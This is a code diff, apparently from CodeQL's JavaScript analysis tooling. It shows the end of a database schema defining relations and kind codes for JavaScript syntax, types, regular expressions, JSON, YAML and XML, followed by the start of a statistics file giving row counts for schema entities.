= @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/src/semmlecode.javascript.dbscheme.stats new file mode 100644 index 000000000000..97ba6f9bcc36 --- /dev/null +++ b/ql/src/semmlecode.javascript.dbscheme.stats @@ -0,0 +1,28248 @@ + + + + +@location_default +15664049 + + +@file +6457 + + +@folder +1590 + + +@externalDataElement +950 + + +@toplevel +5320 + + +@script +5200 + + +@inline_script +86 + + +@event_handler +31 + + +@javascript_url +3 + + +@template_toplevel +100 + + +@stmt +1096691 + + +@empty_stmt +1136 + + +@block_stmt +204994 + + +@expr_stmt +610340 + + +@if_stmt +68214 + + +@labeled_stmt +1378 + + +@break_stmt +10149 + + +@continue_stmt +1642 + + +@with_stmt +4 + + +@switch_stmt +1569 + + +@return_stmt +48209 + + +@throw_stmt +2305 + + +@try_stmt +1316 + + +@while_stmt +3120 + + +@do_while_stmt +1471 + + +@for_stmt +5385 + + +@for_in_stmt +1315 + + +@debugger_stmt +3 + + +@function_decl_stmt +16771 + + +@var_decl_stmt +105606 + + +@case +8674 + + +@catch_clause +1272 + + +@for_of_stmt +61 + + +@const_decl_stmt +1118 + + +@let_stmt +551 + + +@legacy_let_stmt +1 + + +@for_each_stmt +1 + + +@class_decl_stmt +41 + + +@import_declaration +8 + + +@export_all_declaration +1 + + +@export_as_namespace_declaration +5 + + +@global_augmentation_declaration +5 + + +@using_decl_stmt +5 + + +@export_default_declaration +5 + + +@export_named_declaration +31 + + +@expr +5495305 + + +@label +722373 + + +@null_literal +15525 + + +@boolean_literal +31652 + + +@number_literal +557620 + + +@string_literal +268843 + + +@regexp_literal +2773 + + +@this_expr +128651 + + +@array_expr +28131 + + 